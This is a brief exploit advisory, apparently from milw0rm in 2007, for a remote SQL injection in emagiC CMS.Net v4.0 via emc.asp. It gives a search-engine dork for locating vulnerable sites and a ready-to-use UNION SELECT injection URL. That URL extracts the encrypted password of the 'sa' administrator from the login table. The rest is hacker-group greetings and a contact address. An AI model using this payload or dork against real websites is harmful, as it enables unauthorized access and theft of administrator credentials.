1 −−−−−−−−−−−−−−−−−−−−
2
3 emagiC CMS.Net v4.0 Remote SQL Injection Exploit
4
5 −−−−−−−−−−−−−−−−−−−−
6
7 + Found : hak3r−b0y
8 + Gr33tz : darko , V4 CrackerS , hacker_alQassam , Ans , Barra, all ans−hacker.com members
9 + Script URL : http://www.emagic−cms.com/
10 + D0rk : inurl:emc.asp?pageid=
11 −−−−−−−−−−−−−−−−−−−−
12
13 Exploit:
14
15 emc.asp?pageId=1’ UNION SELECT TOP 1 convert(int, password%2b’%20x’) FROM EMAGIC_LOGINS where username=’sa’−−
16
17 y0u will find the crypted password
18
19 for the admin ’sa’
20 −−−−−−−−−−−−−−−−−−−−
21
22 ContacT: mohamed_amine_1991@hotmail.com
23
24 −−−−−−−−−−−−−−−−−−−−
25
26 # milw0rm.com [2007−10−28]
Page 1/1
emagiC CMS.Net 4.0 emc.asp Remote SQL Injection Vulnerability
hak3r−b0y
10/28/2007